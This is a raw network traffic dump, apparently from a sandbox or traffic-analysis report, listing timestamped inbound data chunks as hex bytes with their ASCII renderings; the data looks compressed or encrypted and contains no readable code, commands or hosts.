                                                                                                                                                2022-09-29 12:51:45 UTC18569INData Raw: 7a f3 e2 34 77 4a 3d b2 7a a5 18 54 e7 f2 9f 77 ad e6 b6 d1 c2 f2 d7 9a 77 a6 85 90 ce 84 0e 16 f7 90 a0 6d b5 5d fd e2 f9 eb 2e 82 c0 50 f3 18 9d 00 2b 0a 18 af a8 de 4b 6d c5 11 7d 02 ee 79 89 65 61 8b 3c ae 2b d5 45 2f 8f 95 45 7f 2a 72 a8 7d 8f f3 e0 55 fc dc da e8 48 4d bc 71 e8 6b 4e ba 8f b7 28 4a db e4 c7 74 6d a8 e8 be c7 82 ac 03 65 ac cb 56 fb 76 b3 d4 3d e9 43 a6 88 d7 73 a4 c5 c6 43 9d a3 c0 14 7f 2a 38 6d fa 37 a8 22 63 cd b9 ec c3 be 73 71 8d 18 79 90 be 3a 31 6f c8 96 b6 23 d4 27 fd 86 d2 92 96 e9 88 e4 4d af ef bc 2a 57 67 d1 da e2 48 92 79 17 ee b0 98 6c fa 03 23 55 30 c3 ff 77 c0 ee 0f cc 34 2d f7 61 c2 5e 1e c8 d4 b4 4e 25 9e 54 9f 55 8e df 2f 42 40 d9 15 c8 32 00 3f 9f ca 19 9a a3 63 c9 e7 d6 79 6a 3c 2a 88 b9 52 0b bd 95 6d 84 b5 f7
                                                                                                                                                Data Ascii: z4wJ=zTwwm].P+Km}yea<+E/E*r}UHMqkN(JtmeVv=CsC*8m7"csqy:1o#'M*WgHyl#U0w4-a^N%TU/B@2?cyj<*Rm
                                                                                                                                                2022-09-29 12:51:45 UTC18585INData Raw: a5 98 b9 9b 76 f1 cf 0a 41 e6 89 f0 fd 34 f3 80 3a 6a 05 44 ab 27 bf ff 87 fe 4d 80 6f a8 d9 64 30 b8 18 a7 d6 46 77 1e 85 86 0c 91 73 b3 88 9b 1f 10 63 61 12 8a 12 39 53 3d 3f 9e 8c b4 02 fe 79 7a 09 1b 19 bc de c8 b5 2a 41 a6 74 e7 4f 34 7e da 96 8b f2 f2 6c 25 9d 95 60 09 8a 4f 77 c5 1d 35 17 99 9a 8c 90 71 a4 3d d8 d4 01 7c fb 2d b8 2b 92 57 3d 92 f0 b9 90 d7 db 29 ea f2 00 84 aa 9e 0b eb 57 96 4b 61 17 77 26 db 32 90 46 0b f0 6e b8 5d 0b 44 5e 71 a7 2a e6 29 d2 ad 16 34 e5 c3 34 f1 64 77 c1 e3 5a 18 da 47 03 53 bd 1c df 34 0b 9f 71 45 a3 d1 01 61 be 4d a0 1f 2a 3c 55 e6 4c 1e c9 b1 8f 7c b2 ed 15 4b b0 94 1e 7f 8c 1c 9e fc 3b 67 64 86 66 2d 36 34 7e 11 85 1a 99 01 9c 8e 70 b4 75 34 32 12 40 ee 8a 68 16 ee cb d1 c8 73 e8 8a 8a 32 c0 33 6a 3d 78 04 00
                                                                                                                                                Data Ascii: vA4:jD'Mod0Fwsca9S=?yz*AtO4~l%`Ow5q=|-+W=)WKaw&2Fn]D^q*)44dwZGS4qEaM*<UL|K;gdf-64~pu42@hs23j=x
                                                                                                                                                2022-09-29 12:51:45 UTC18601INData Raw: 86 9a 0c 01 5c 21 db 93 83 8c c4 9f 20 1c a9 58 cf 93 9b 59 35 ed 09 3b 6a e5 c5 30 97 22 d3 86 0d bd 57 a5 e1 51 be 20 25 c1 0b dc 6c ca 7f 23 51 97 d2 3e d6 ca de e7 b7 4d e4 2c 1d 94 ed 32 b8 4a 38 50 c0 ac af fb c9 27 0f 8e ac b7 c3 75 d9 fa 1f ef 71 02 2b 1c ed 49 ba 9f 90 f1 c3 21 d2 ab 80 a2 b2 cb 3d 63 fe 7f 43 09 57 64 86 d2 6e ea 85 5d cc 2f 38 e4 a6 d2 71 3f 70 ed 41 00 97 fb 50 20 a0 ef ec b9 8e 92 35 02 1b 6f 80 2c 1e 76 b0 35 ea 25 76 b3 f1 bf d9 fd f2 db fc f5 64 4b 30 e7 40 60 f4 f3 5b ff a6 27 91 81 e4 1e 7c f7 3c 21 c7 26 db 89 06 77 2a a3 1a cd 18 dd 20 fc d4 0d 9e 2c a4 d6 5c 0a cc 1e a9 ed 5f d8 c2 20 1e 79 09 0a d9 18 5e 1d 8a 13 bd 97 2d ab 3a 06 1a 9e b1 09 1f 60 ea 26 f0 93 9f 25 e7 f8 2e 12 85 18 d6 fc 99 91 09 3f d9 e2 9a 67 b5
                                                                                                                                                Data Ascii: \! XY5;j0"WQ %l#Q>M,2J8P'uq+I!=cCWdn]/8q?pAP 5o,v5%vdK0@`['|<!&w* ,\_ y^-:`&%.?g
                                                                                                                                                2022-09-29 12:51:45 UTC18617INData Raw: 35 85 12 70 26 00 08 36 ca f6 93 b0 cf 41 63 2e 1f a5 8e 60 22 1b 38 f9 54 cb 73 0f 4a 7f e8 f3 32 31 fe 59 33 af 90 b1 0e 94 1d 4b 32 61 c8 3d c6 5c e6 da b4 3b eb b2 4f 9d 5c 85 30 45 d8 07 c8 9d 54 ab 09 2c a4 ac 29 99 a7 53 7c cd 9a 7d 85 0b 21 be 33 92 98 60 b6 19 39 e3 7d 2b ce c1 09 43 2b 53 e8 46 14 ca 1c 70 4b bc b3 b7 ab 7b ea fc 5e 1d 9c f8 45 7a fd 2e 3a a0 2a 75 a0 66 df f8 cb ae 5f 6b 2b 15 12 1d 69 cd 14 45 44 d6 8f 0b 63 bb 3e 18 73 13 2a c4 10 94 ed c9 93 1c fd a2 fd 56 af fe bc 08 31 aa 1a 01 23 3c 71 05 93 cc a0 65 d6 fe 2b 2a a9 64 ca b9 b4 f2 92 e8 f0 46 37 b1 fa 2a 6d 07 2a db 5c 0b f9 04 1a 9d 9e 6e 43 74 9e 2e cd 8c ee 7e 97 62 b4 cb 38 a5 bb 43 f5 ba ea 51 f7 8c c4 d0 b6 4f a4 f2 fa 5f de 9a 13 e9 c2 2e 90 64 4d dd 96 f9 1c ea 9c
                                                                                                                                                Data Ascii: 5p&6Ac.`"8TsJ21Y3K2a=\;O\0ET,)S|}!3`9}+C+SFpK{^Ez.:*uf_k+iEDc>s*V1#<qe+*dF7*m*\nCt.~b8CQO_.dM
                                                                                                                                                2022-09-29 12:51:45 UTC18633INData Raw: 7e 28 a5 d6 07 9f 5b 02 53 b2 80 73 7d e0 43 bd 53 b1 b3 c8 e1 21 90 ac c3 50 65 62 2a 74 c8 79 48 c9 d0 68 84 0e 64 33 51 4c d0 02 ca 9d b7 e1 c7 28 aa d0 81 89 4b 84 57 cd b3 86 67 a0 c4 df a8 57 05 9a 99 d5 01 71 e9 f9 c9 7c 9f 02 03 e1 e7 08 f9 06 74 e9 9a b1 e0 44 d5 fa 40 91 6e 2a 6c f6 7f 1a b1 f7 bc ec 21 e9 1c 6d 3b 5c c3 53 39 b7 ed c3 c4 00 ea 1b 49 22 df b7 e8 af f7 d8 a6 f8 3f b7 a3 44 46 af 14 7a 59 9e dc d4 84 d0 a6 06 d9 b9 14 46 8a 9b 3a c2 40 dd 9e 35 4c 4d 4f 6e 5e 66 93 19 57 65 97 73 cd aa 1b f6 ed f6 c1 86 16 ef 37 74 d7 68 b4 4a 9d 9d 42 49 6e 58 45 2a fc db 04 c3 96 09 ac 23 87 60 ea 46 d2 14 1f f9 08 3b 9a 62 79 32 29 4a 52 8c 36 c9 b2 af 71 8f 68 a7 ae 3a f2 78 48 cb 26 cf 10 8a a5 bf 7e fc 8d 7d 72 66 0c e2 c6 c1 b8 1a 9e c7 02
                                                                                                                                                Data Ascii: ~([Ss}CS!Peb*tyHhd3QL(KWgWq|tD@n*l!m;\S9I"?DFzYF:@5LMOn^fWes7thJBInXE*#`F;by2)JR6qh:xH&~}rf
                                                                                                                                                2022-09-29 12:51:45 UTC18649INData Raw: 51 8e f3 65 b9 5c c9 d1 e4 d5 d4 63 57 3a 92 54 7a 28 a3 68 13 91 d5 64 98 18 26 ab 6a cc 67 a6 53 73 fc 63 e7 69 67 00 a3 8d bc 0a 23 b4 52 80 6d e0 97 6f 4f 65 46 76 4f 08 be c5 f0 06 10 2a f6 1f d2 e8 74 92 06 e1 b6 0a d4 40 c8 f5 cc 19 3b 62 f0 8c 2e 72 9d 44 1a 35 1c 2b ca b8 3e 82 30 f9 ce ce 83 af e7 5e 66 6e ae 08 23 ed a2 eb b4 46 5b 2a 90 11 ce 1f a5 ea 94 4e d4 c9 42 c0 fb 3d 89 9a d7 e7 81 22 42 55 85 12 3e cd c8 12 bf dd 89 78 f1 40 cc bb 80 e3 87 42 d1 36 22 2d a8 5d cb 55 dd 0f 1d 47 b8 b8 12 66 8c ff d5 69 96 e5 b9 85 18 29 c9 02 e1 68 72 ab ba 84 54 95 05 d9 ca 1e 81 71 48 5d 84 19 a0 99 01 e2 27 0f 83 29 3d b5 25 47 6b 0b e4 4c 40 fe 45 87 6d cf 05 e7 e0 dc c5 de 2a 7e 5e e4 ae 20 8e e2 48 79 41 b1 f5 95 ca 51 b7 ef 32 f3 0f a3 f3 49 10
                                                                                                                                                Data Ascii: Qe\cW:Tz(hd&jgSscig#RmoOeFvO*t@;b.rD5+>0^fn#F[*NB="BU>x@B6"-]UGfi)hrTqH]')=%GkL@Em*~^ HyAQ2I
                                                                                                                                                2022-09-29 12:51:45 UTC18665INData Raw: 4e 41 c9 68 ac f3 37 f5 7d ba bc 85 0b 9e 95 df 51 1d 67 d5 57 5d ea 4a b0 1b d6 fd 88 9b 67 c7 05 c6 a0 1e 2a 22 9e b8 db 3d 7c 3a 2f 30 33 b9 ca e8 e3 00 4d 92 3f 85 38 d0 69 0b 1f 6a 4c f3 99 1c 0d 34 ce 4d fb a0 e9 95 be 59 a8 ac 1d d0 fd 54 ec a5 ab 90 f3 c6 e0 96 a4 26 e5 8c 77 03 db fe da 29 f2 1c 33 93 24 3d d7 01 7f 2c b2 86 36 ba fe e4 67 58 ee ae 91 37 ee 3c 4f 81 22 95 3b a2 72 9b 60 09 47 e7 b2 ba 77 45 32 c4 76 36 49 20 58 ce b7 bb 04 de 91 b0 6e df 60 4a 3c c1 e6 85 75 8c 69 2d b2 91 c9 1e a3 e3 29 f6 54 5a 79 ed d6 20 4d ee 82 dc 28 56 c6 20 34 01 fc e9 15 9d a8 4f 0f bf ec 29 67 22 54 8b be 66 ca 38 a1 45 d0 df 00 3b 4a 14 b9 9f 62 9d 51 93 1c 85 b4 6e 48 c4 9f 93 10 c4 0e 38 fb cb 3b ce ee 72 16 2b 87 12 7f a5 da 3d d3 5e cb b2 c4 13 00
                                                                                                                                                Data Ascii: NAh7}QgW]Jg*"=|:/03M?8ijL4MYT&w)3$=,6gX7<O";r`GwE2v6I Xn`J<ui-)TZy M(V 4O)g"Tf8E;JbQnH8;r+=^
                                                                                                                                                2022-09-29 12:51:45 UTC18681INData Raw: bb b8 d0 c2 25 a4 aa 5d e6 3a b7 74 d8 ad f4 03 4b 39 89 15 0d 8f ce f6 a4 ad f1 d1 7c 7f eb e3 50 7a 82 f2 d4 1a 4c a9 03 e7 b7 8c 04 8b ad 21 54 6e 5a 7c 7c d1 c4 7b 3e 92 50 4f 4f 01 e8 06 26 aa 0f 5b f2 7d 4d 3d f1 73 d6 71 93 06 3a f4 4b c8 65 63 ec 51 67 fc 47 00 fa a9 35 38 da a6 b8 b9 aa 20 19 1a 0b 15 13 8e 6d 99 8e 15 85 1a b4 f2 0b 06 d8 e2 2f e1 6f b4 bd 53 f7 ea 7b dc 1c a6 94 c7 2b c8 4f 64 24 81 1f 58 3d a8 fb fc 94 b0 fe 10 ee 66 b9 97 c2 13 13 8c 04 ba 83 f2 a9 ba cf 93 7c d2 7e 4a 5f 45 76 d3 34 ed 70 83 ae 4e e4 34 64 6a ef c0 0b 8f 73 8c 54 b2 a6 8b 09 37 68 13 d6 c1 d5 1b 77 51 96 f2 e3 7c 9e 43 a4 68 fa 7c 81 5d 98 14 93 33 00 22 e2 59 e6 c0 09 e5 39 8a 90 9a 7c 35 17 68 bb 12 fe 79 10 4d 60 da df 54 fd aa eb 62 c7 e4 be 79 10 7f 6a
                                                                                                                                                Data Ascii: %]:tK9|PzL!TnZ||{>POO&[}M=sq:KecQgG58 m/oS{+Od$X=f|~J_Ev4pN4djsT7hwQ|Ch|]3"Y9|5hyM`Tbyj
                                                                                                                                                2022-09-29 12:51:45 UTC18697INData Raw: a8 af 53 19 91 b8 50 92 91 17 43 6a a3 fd 9b 38 02 fd 3e 6c 48 aa cb ce 04 57 e8 c6 94 da c3 0d 1b 0d 7d fa ad ca a3 f4 b5 45 4c ed 86 e8 d3 5a e9 59 c6 83 00 e2 59 09 84 ae fe ae 0b c0 57 ac 74 7f f8 d4 47 43 96 f7 a5 ab 40 d5 bf cf 25 a0 51 8c 86 54 77 49 61 1c 8f 58 a6 ed 79 6e 34 5a 60 9a 46 f4 29 a3 b7 bc 38 9f 25 10 80 26 c3 5b 22 28 47 86 b3 eb 7b 02 c9 81 e0 9d 0a 6e 81 dc bf 17 ab 85 20 d0 c4 c7 8e 38 75 6c e8 92 70 79 41 b0 0e 1b e4 30 73 44 5e d5 17 c5 88 50 83 f1 2e a9 f0 d9 8c 84 d6 09 97 d3 c2 b3 99 2d d1 3f 49 a5 2d 1d cd 90 05 2a 74 79 79 7e 76 92 ad d1 12 38 9f b9 1e 51 aa da f6 93 59 6c b2 36 5e a9 8c f5 27 89 c1 c9 f6 5a b4 83 ad cf ad ff 07 bd ba 12 16 c8 38 89 24 48 5f 52 f3 0e 3a b0 97 8f 7a ec 83 ae 11 48 26 cc 9d 89 f9 43 99 2f db
                                                                                                                                                Data Ascii: SPCj8>lHW}ELZYYWtGC@%QTwIaXyn4Z`F)8%&["(G{n 8ulpyA0sD^P.-?I-*tyy~v8QYl6^'Z8$H_R:zH&C/
                                                                                                                                                2022-09-29 12:51:45 UTC18713INData Raw: 32 3d c7 65 85 0c 82 04 9b b9 db e8 ee 1a 47 28 11 34 78 db 3f 5f c6 7a 65 85 76 97 c3 0b 29 b8 07 04 2a 9c 17 96 b9 2f b6 38 13 df de 97 ef b2 e5 3e ce 75 3b d1 98 ad 51 55 8e 3e 1d 81 d1 33 94 aa 18 56 13 b7 9d 3e 56 05 c9 3f 31 72 5b 4e 2f a2 55 b5 b1 40 3e 8a 9d 9c 74 8c 9f f7 0d 02 f5 dd 7f 72 47 8a 23 35 51 83 4e c5 19 80 14 64 cd 3a 72 4e ef 49 ac 22 51 41 9c 97 66 f7 a0 42 f0 17 9c 0d aa eb 22 fb 56 9f ce 88 52 77 61 d1 83 12 06 a4 c5 b3 f3 84 99 04 26 a3 1a 4b 31 13 82 3a 15 83 16 ff fe a4 ad 73 ee b8 9d eb 18 ec 7a df 63 af 56 35 5a 5d bf 96 b3 d9 d7 62 d7 a8 7a 00 67 2e f3 dd ad d3 a4 13 e7 d9 3d 12 a3 25 a8 48 5a ee 1f a9 8a 02 2b 13 c7 5f d8 eb 03 44 fb e4 6a e6 78 7c 1b bf d4 a8 10 a7 36 09 8c 25 90 34 65 0b f5 79 1c 83 70 dc c8 24 b9 41 44
                                                                                                                                                Data Ascii: 2=eG(4x?_zev)*/8>u;QU>3V>V?1r[N/U@>trG#5QNd:rNI"QAfB"VRwa&K1:szcV5Z]bzg.=%HZ+_Djx|6%4eyp$AD
                                                                                                                                                2022-09-29 12:51:45 UTC18729INData Raw: 03 51 6d d6 d2 30 23 f1 e2 ad e9 db 80 0f 9a 9a 26 a7 f4 4b 49 8d ce 0d 48 62 71 db 72 56 c4 d2 46 1d 4a 08 e3 9f 8b 9c fa 0a 96 ff cb bb 65 87 2d 55 e2 a0 b4 2e 9e 39 36 0f 6c ac ea be fd 16 08 68 62 44 fd 8b 35 2e fb 65 e0 bd d1 27 81 aa 54 44 b7 06 e7 eb 3c f0 a2 9b b5 80 db ea 51 7f 93 02 ec ec 25 42 c2 2c 65 09 f8 b9 8d ba 05 c6 da 20 ea 07 2b 0d cc bb 65 f4 54 cc 3b 8b 94 1d 33 8d ac ce 56 9d 94 35 b5 be 8f 92 b1 af ad 8f 36 09 21 19 29 58 86 c6 95 2c 21 65 f9 62 a1 f4 36 ed bb a3 94 57 0a 45 76 00 05 35 c9 00 76 e9 2b 17 d0 ca bb e0 85 0f 2d 02 7b bd 28 07 99 16 0b 75 48 8e 97 64 b8 2a 44 36 67 aa 89 01 5d f7 bc ae d4 1e 60 17 b2 b9 6f ce b1 b4 9b 87 14 f4 08 92 06 ac 1b 57 7b 0d 11 eb 4e d2 8f 92 bb 44 20 07 39 c1 16 7e 6e 4b cf d8 6a 2c 28 de d1
                                                                                                                                                Data Ascii: Qm0#&KIHbqrVFJe-U.96lhbD5.e'TD<Q%B,e +eT;3V56!)X,!eb6WEv5v+-{(uHd*D6g]`oW{ND 9~nKj,(
                                                                                                                                                2022-09-29 12:51:45 UTC18745INData Raw: d8 40 ef 10 18 9d 19 ec d3 16 84 ca f0 5f 0b 97 c3 46 3c bd 2f 5f 4f 9b cf 4c cb cb c5 9c 6b 28 32 61 8e cc f3 9c 1b ab 29 8a e0 b0 f1 28 82 67 2c 7e ed 21 b7 19 c3 a5 c0 2f 4e a8 bd fa 08 16 0f 57 08 59 14 90 f6 a8 59 c0 81 f3 a7 03 86 c8 ee 98 8d fe cf f6 0a e9 ea 5f 72 36 43 1e 25 c8 75 2b f2 40 31 ca 3b d8 8d e0 b4 e2 a7 12 25 b0 89 e2 20 02 cc 99 12 c4 a3 c8 b4 b5 32 92 8b 01 58 dc f0 ce 58 02 a5 b3 5b 25 05 ac 0d e8 ad cc 3c 78 6b 06 08 b8 aa 27 32 de ff d1 60 4d fd a9 77 36 ea 73 0a 48 0f df b1 25 f7 2a 12 24 43 4d 9d e3 c3 97 da f9 b6 0f 15 be 82 0a 01 60 91 11 78 44 eb 95 44 c7 df 83 96 e5 36 5a 83 7b 6c a9 29 14 ad 52 48 df 34 bc b4 f0 aa 5e ce 17 5f ec d1 eb d1 a0 31 f4 23 17 c2 93 58 e6 d9 a3 bf c5 82 ba 5e 03 81 87 f0 e1 b0 16 1e c3 0c a8 8d
                                                                                                                                                Data Ascii: @_F</_OLk(2a)(g,~!/NWYY_r6C%u+@1;% 2XX[%<xk'2`Mw6sH%*$CM`xDD6Z{l)RH4^_1#X^
                                                                                                                                                2022-09-29 12:51:45 UTC18761INData Raw: 74 84 5e 33 f5 fd 78 27 6b 81 b0 91 ad b8 c8 bc 48 b6 fe ce ec 94 24 01 43 36 92 46 a7 c3 a6 4d 2d 69 0f 8d 9d 38 4b 2c c4 f0 90 7d 5f b4 44 8d cd 07 b8 25 aa cc 8d 68 4b d0 ef 93 cd eb 1e 96 42 75 ae 90 f0 da 93 c6 66 52 be ec 11 37 bb 54 94 9d 12 a1 12 9b 35 a0 71 cd 09 ba 5f 4f f5 d6 e2 91 bb d0 8b 03 9d 47 0a f4 6d 02 32 fe 86 2b 29 86 fa 06 1e 5f 68 50 8b d6 39 28 aa 1a 2e 55 13 bf 8c d7 fe 08 5f ec 16 3a c1 50 50 de 2b 7c ee 4e 6a ab c6 42 f3 05 35 5e c0 44 05 ab 64 87 dc 73 6b 3a 10 4f 50 96 67 68 38 4b df 43 0e de 80 c9 8f 80 86 68 d5 a7 52 bf 33 87 33 57 13 b5 fd a1 93 0b 59 f4 01 fc 1b 78 b1 a2 83 8b 2c 87 4f 3c 29 9e e7 e5 e4 f9 e1 cb 5d 97 c4 45 38 c8 08 a5 25 70 a3 71 0e 5c a2 31 bb f9 c9 24 5a b9 f8 bb 83 9e 40 c9 6f 02 99 1e 53 a5 b9 46 c9
                                                                                                                                                Data Ascii: t^3x'kH$C6FM-i8K,}_D%hKBufR7T5q_OGm2+)_hP9(.U_:PP+|NjB5^Ddsk:OPgh8KChR33WYx,O<)]E8%pq\1$Z@oSF
                                                                                                                                                2022-09-29 12:51:45 UTC18777INData Raw: 21 55 f7 a6 46 e9 83 f1 f0 0c 80 01 d9 a9 b7 e4 68 a8 6a d2 fe d2 9c 7f 19 c8 27 72 dc 5c 7f f5 da 7e f1 39 d2 8a 83 5e 72 fd 75 84 ca ea 03 b9 13 5e 7c ff 37 06 93 d1 de a8 fd a8 f9 45 c9 9c bd 2a ba 38 2d 4b 10 d3 93 69 cd 5a 95 cd 27 87 8f ad 83 1b 5e 55 73 bc b4 5f 4a ca 76 f5 dd 35 ab 2f b7 a2 86 0e d7 54 03 77 a3 a4 25 1e c3 b7 0a d6 8d e5 ec 7b e7 66 e8 d2 7a 4c fa 8a 82 6b b0 78 7f c9 27 84 0a 5a 87 3c ab 63 76 c3 d1 3e 87 65 45 d0 7f de f8 8e 76 4b 24 5b 17 de b9 45 49 58 9b d3 c2 e5 1c 01 6b 0f b1 79 02 21 11 5c 5e 0b 69 d3 80 ed 83 3b 5b 3b 96 9d e4 ac 0e c0 78 9b c8 8c 5c f6 18 83 4e f7 9f 7e c7 cc 96 ea 58 6c 24 74 97 e8 ea b6 c8 b2 3d 44 c2 de 00 cb da 8a 4c 44 2f 86 ef fd b7 a2 2f a9 a3 cf 00 00 d4 9f 1f 23 ed 44 7c 73 6a 71 02 2b 24 f1 1a
                                                                                                                                                Data Ascii: !UFhj'r\~9^ru^|7E*8-KiZ'^Us_Jv5/Tw%{fzLkx'Z<cv>eEvK$[EIXky!\^i;[;x\N~Xl$t=DLD//#D|sjq+$
                                                                                                                                                2022-09-29 12:51:45 UTC18793INData Raw: b9 47 93 20 89 d3 04 6a ca 27 37 c9 87 29 d9 c5 d6 33 3a 06 cc c8 88 5c c7 d2 ae 21 6f e4 b3 61 66 2d 88 9c 60 cc 62 ba 67 a2 cd 1d de 0e 52 93 ba 73 d7 93 f3 d8 c3 77 07 83 04 7e b5 4b ec 1f 5c 35 fb a5 45 f8 9b 5c 5f c5 9a a4 b7 87 a7 5a 4f df 70 f4 56 e9 5b f3 f8 bf c9 f3 2f 82 36 cf 58 c5 38 fd 27 eb ca 22 8c 73 84 14 d6 da 05 b5 50 a9 b4 1f c9 ae 41 a9 70 65 ee 78 49 fe 91 b4 86 f6 63 0d c8 26 9d c9 b4 29 9a 0f ca ad bf 20 e2 70 05 99 ff 09 11 85 96 a6 4b 72 d7 15 79 b5 4d ee 23 60 fe 7e 1c a7 72 45 eb fa b1 74 b4 7a d9 ee 3e fd 4e 42 b1 25 55 53 36 9e ec 2a 8e f2 32 54 ec b7 92 72 d9 15 65 79 d4 ce eb 85 ce 1f 6e be fe 43 12 1c 55 b5 8f df 9e a8 ff fe cb 80 6c bd d8 c7 88 2e f6 75 39 4c 5d 85 aa 3b b3 b6 f1 1f df a5 cf 7d 4f 77 d1 29 37 ce ca e0 1f
                                                                                                                                                Data Ascii: G j'7)3:\!oaf-`bgRsw~K\5E\_ZOpV[/6X8'"sPApexIc&) pKryM#`~rEtz>NB%US6*2TreynCUl.u9L];}Ow)7
                                                                                                                                                2022-09-29 12:51:45 UTC18809INData Raw: 2b fe bf a6 ee ed 86 65 27 f5 eb 03 99 6e f2 c3 3b ad b3 e4 0c d9 4f 4a 73 b6 db 26 8a 61 d4 f6 08 ad 06 3b 1f 4b 53 f4 fe 74 cb 41 c0 87 b1 0d d9 6d 88 b6 71 d6 a7 51 ba 6e 58 74 81 e7 2d 6c be 78 e0 9c 65 82 14 c7 4e 10 32 72 7a 56 06 a1 43 a1 c3 4c 28 99 4d b4 78 40 7d 7c 68 aa 85 75 3b 8b b8 44 ac 18 24 fb 2b dd 1f 1f 6c c7 56 14 c1 93 58 dd 48 26 12 4d 13 95 6f 50 bd de d3 71 09 9a 88 ee 5a 76 21 bb 7c 6b c4 b1 4b 01 22 0d 66 ba 0a 54 10 20 66 e4 20 d6 30 90 4d 87 13 7c 24 a8 95 10 0c ea 4c 79 01 bf 9b 93 f8 b8 68 e4 e9 19 23 5e 15 b0 20 e4 37 b3 03 52 02 7d c6 a2 66 28 d8 b3 51 11 73 8a 64 10 19 83 2f ae 23 63 bf b0 a2 d3 f4 d1 78 46 6f fe 03 52 0f 0c 48 56 97 a8 7a d7 0b 41 4c 15 07 5b bd 67 ea 53 50 01 cd ca 18 54 00 cd 53 95 4e 60 f0 c8 5a 0a b3
                                                                                                                                                Data Ascii: +e'n;OJs&a;KStAmqQnXt-lxeN2rzVCL(Mx@}|hu;D$+lVXH&MoPqZv!|kK"fT f 0M|$Lyh#^ 7R}f(Qsd/#cxFoRHVzAL[gSPTSN`Z
                                                                                                                                                2022-09-29 12:51:45 UTC18825INData Raw: 8d e2 6d 98 1b 71 98 87 82 49 bf 7e 76 99 bd c9 f6 d9 c2 8f 4d 8f 72 38 56 b5 ee 12 16 97 98 64 d5 41 ec 3e 60 69 3d 55 04 ba 54 c0 c8 ae 24 2c 34 99 46 fd 50 1e f9 8b c7 00 f0 cd 19 17 b8 11 31 5e d0 88 00 e7 5c f6 6c 71 9a 7f 7b ed 68 0a fe 2f 7f 18 41 69 a5 96 4e 7b b9 50 4c 34 da df 63 79 ea 04 4f 5e 2f 2d ea 11 d4 b1 fa 96 58 8c 75 83 22 26 92 9b 0a c0 22 27 22 af 52 6d e8 41 5b dc 91 18 e3 23 75 5e a7 82 a9 13 32 d2 c0 94 ce 27 ec 5e 6a 47 e2 ef de 31 33 3b 80 ad 07 2d f0 42 bb 61 d0 68 3b 6d 69 f9 e7 8b 13 48 54 22 60 27 b0 85 4d d3 2c 96 b1 1b 3d bf ca 4d fa 0c a7 c8 bc e1 d3 5f 26 04 6e 5f ce e2 6a 9b 4e b7 a3 d2 ed a6 42 e3 8a fd e4 e4 a1 1e c2 29 68 bc 3d 36 96 db fc e3 b4 32 ac 80 78 74 88 ff 19 cf f6 31 62 29 0f 9f 02 02 18 c6 5d 9d ae cd a6
                                                                                                                                                Data Ascii: mqI~vMr8VdA>`i=UT$,4FP1^\lq{h/AiN{PL4cyO^/-Xu"&"'"RmA[#u^2'^jG13;-Bah;miHT"`'M,=M_&n_jNB)h=62xt1b)]
                                                                                                                                                2022-09-29 12:51:45 UTC18841INData Raw: a7 a6 4c c4 37 a0 cb 2c 2e fd c9 2c eb 54 b9 b4 cd 92 da d0 32 5f cb ed e8 c4 f9 90 f5 55 e4 96 49 9c ce b5 7f bf 5e 8c 83 44 0e 00 de 12 4f d6 71 67 6c ca 03 f9 dc c9 7b 55 e2 a7 0e 67 aa 94 60 b8 48 24 93 76 6d ee 99 5a ff 42 50 ca 45 d6 a7 75 99 6e dd 3f 7c 55 3e d1 5f 1e a8 99 38 52 50 1e e7 a9 a6 ef 15 e9 39 35 be 1a 06 c8 ba 3f 7c ce 69 40 31 2a 25 79 69 07 1f 07 03 1c 51 53 cc c7 30 3e 35 27 14 22 24 a4 cc 8d ed fb 06 35 58 75 a4 28 6d 3d 62 ae 8d ec 3a 3b 7b b6 3d 10 0d 40 ee 2c a9 cd 3d 31 b9 b8 be 60 89 86 6b db 37 b9 37 cf 3d 9f e4 ee a4 7d ee e8 fe 17 79 8c 59 39 5c 06 89 11 a6 ec 10 f6 ea 5e 13 0a 88 f2 d0 da bd 9e bd b0 e8 63 cf 36 fa e0 b9 92 31 11 c7 7b 26 a0 a4 6d 02 33 db 32 5f fd 2a 8e 5e 45 0b cb 7c 81 2c c7 cf cd 15 ce 32 b0 c5 52 8d
                                                                                                                                                Data Ascii: L7,.,T2_UI^DOqgl{Ug`H$vmZBPEun?|U>_8RP95?|i@1*%yiQS0>5'"$5Xu(m=b:;{=@,=1`k77=}yY9\^c61{&m32_*^E|,2R
                                                                                                                                                2022-09-29 12:51:45 UTC18857INData Raw: 1f fa b4 8a 4c 38 80 c7 c2 3b 73 5e 2e f4 50 b1 54 16 8e aa d4 6f 1d 21 e5 86 05 fd 0c 0b d8 76 c3 4c 4c ae eb 2f 28 25 9f 11 1b 39 3c 8e a5 6b 0c f7 42 c5 be a3 d7 3f 43 5d 92 4e 20 44 61 7c 18 1f f7 21 4c 43 b4 d7 ce c7 bd 71 d1 ef 11 81 93 43 3c af 95 50 cd e6 cf eb e0 a4 0e ab 57 0e 16 5b db c1 e7 cf 06 1c 00 23 b0 67 10 61 29 82 8d 13 ff dc 0f 6c a6 12 f5 7a 9b a1 5e 07 2d 03 24 40 98 1d 0d ae aa 7e 26 b3 2e 36 3c 60 01 05 91 26 58 d3 9b 1e a5 84 7a cf 18 83 19 70 03 76 ca 57 b8 0d 49 12 0c 54 cb 7f c5 1d cb bf fd a7 c7 0c 64 e6 75 6b 91 45 c9 6e 48 c7 f6 87 22 94 b1 14 19 e7 e0 ce c9 fc 87 dd 27 07 09 41 02 65 97 d0 74 26 45 ae 18 e4 88 34 23 aa 32 dc 59 dc 28 01 fc de 9f 77 e6 ca bd 42 36 46 a1 5a 2d be ce eb 1a d6 ea fb ed 26 c3 17 0f 4f 94 f0 b9
                                                                                                                                                Data Ascii: L8;s^.PTo!vLL/(%9<kB?C]N Da|!LCqC<PW[#ga)lz^-$@~&.6<`&XzpvWITdukEnH"'Aet&E4#2Y(wB6FZ-&O
